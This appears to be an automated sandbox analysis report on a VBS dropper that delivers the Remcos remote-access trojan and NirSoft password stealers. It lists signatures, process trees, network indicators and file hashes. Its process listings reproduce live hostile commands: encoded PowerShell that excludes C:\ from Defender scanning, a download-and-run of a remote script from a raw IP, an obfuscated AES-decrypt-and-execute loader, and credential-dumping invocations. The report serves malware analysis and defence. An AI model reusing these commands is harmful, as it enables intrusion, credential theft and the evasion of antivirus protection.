Analysis Overview
SHA256
e6e8a9afd766ad37eb26f95a91ce4f85183ec483242d86845e87c5bdaeec9f0d
Threat Level: Known bad
The file SHP_01992336.vbs was found to be: Known bad.
Malicious Activity Summary
Remcos
NirSoft MailPassView
NirSoft WebBrowserPassView
Detected Nirsoft tools
Blocklisted process makes network request
Reads user/profile data of web browsers
Checks computer location settings
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-19 10:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-19 10:17
Reported
2024-07-19 10:19
Platform
win7-20240704-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHP_01992336.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHP_01992336.vbs" /elevate
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADIANAA1AC4AMQAzADUALgAxADQAMwAvADUANQAwADUANQAvAGMALwBJAEUAYwBoAGUAYwBrAGkAbgBnAGIAbwBvAGsALgB2AEIAUwAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTAA==
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 4f8da4a0af71d4efa352820eb2974562 |
| SHA1 | 25e0684deafae353e77325c7578cf6a83fd8bd6f |
| SHA256 | 471932ddc4891e799ac12272c9496a10d43977e34c0ee7c9af80b75ae31ea697 |
| SHA512 | 7a40b8a0cf11c84d444829fd0d00cdb5403caa8db478c98c2b7543f354e8334b7e01b3b4e4d66c96f4191626f117b5b32e68c89eebf1f610f45bd9fe06dca3b4 |
memory/2304-9-0x000000001B1E0000-0x000000001B4C2000-memory.dmp
memory/2304-10-0x00000000021F0000-0x00000000021F8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-19 10:17
Reported
2024-07-19 10:19
Platform
win10v2004-20240709-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Remcos
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5108 set thread context of 1796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1796 set thread context of 1760 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1796 set thread context of 1980 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1796 set thread context of 3576 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHP_01992336.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHP_01992336.vbs" /elevate
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADIANAA1AC4AMQAzADUALgAxADQAMwAvADUANQAwADUANQAvAGMALwBJAEUAYwBoAGUAYwBrAGkAbgBnAGIAbwBvAGsALgB2AEIAUwAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTAA==
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\yzefXCrxTpwrbJhToFS.vBS"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI38252555980957241034615985855951CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\kowmdzctlcdyhcdaewhjdzdwixqb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mqcedrnnzkvljqzevhulgmxnieikfzc"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xkppekxovsnquwnieromrqsersrtykacou"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xkppekxovsnquwnieromrqsersrtykacou"
Network
| Country | Destination | Domain | Proto |
| US | 172.245.135.143:80 | 172.245.135.143 | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.135.245.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastecode.dev | udp |
| US | 172.66.40.229:443 | pastecode.dev | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.40.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 198.46.176.133:80 | 198.46.176.133 | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.176.46.198.in-addr.arpa | udp |
| US | 172.245.135.143:80 | 172.245.135.143 | tcp |
| US | 8.8.8.8:53 | 2024remcmon.duckdns.org | udp |
| US | 192.210.214.9:14645 | 2024remcmon.duckdns.org | tcp |
| US | 192.210.214.9:14645 | 2024remcmon.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 9.214.210.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/1092-0-0x00000205D03C0000-0x00000205D03E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kkyzjd2h.xps.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb4d127b8a6f84a1cee423c5e3e3a51d |
| SHA1 | c55263a8ff097067f2393ce2120801a445fd1949 |
| SHA256 | d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514 |
| SHA512 | 45a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e |
C:\Users\Admin\AppData\Local\Temp\yzefXCrxTpwrbJhToFS.vBS
| MD5 | 2718814507f5502e05d21540f0ebc5e1 |
| SHA1 | 5e33409f382ac6f9d52c8c49e0a0b12ce4dd2140 |
| SHA256 | d6ebd048f0ef80ea876bf28ac630c903b3c960bc7448ab8072f32a0e3e4334aa |
| SHA512 | ac5285820ba227dc4362150015244d5fd92be79c283ad1c30fb4683ef847491b08e7d92321278925a47de5c2215ea836958ab8a2cc6a8ed3429e9f4777bd0e8c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\5G8JI3LV\paste1[1].txt
| MD5 | ad6c37ef980373e9bcbd14810fad34bc |
| SHA1 | 9c061a1b3608b7c7f1db7cd06c8246913ee11bda |
| SHA256 | ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c |
| SHA512 | 30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f |
C:\Users\Admin\AppData\Local\Temp\kowmdzctlcdyhcdaewhjdzdwixqb
| MD5 | 982ebb238759653970e22ee9fad24470 |
| SHA1 | 15fca6be8cc4a276c9f70a73f28c52c3b0eead15 |
| SHA256 | c8b9cad5602932ea51b923f39f4b2d9aedf1f4915880d89032ab6636acaf9bea |
| SHA512 | c8777edf0dd3e72e0cf3bb89db2bc7856fed0eeca7199806fec341e9168899e3b700c73a6b2e7cb0e8ccc5523116d6ecfde5c9ebcc83288a162dd1b0ea78201b |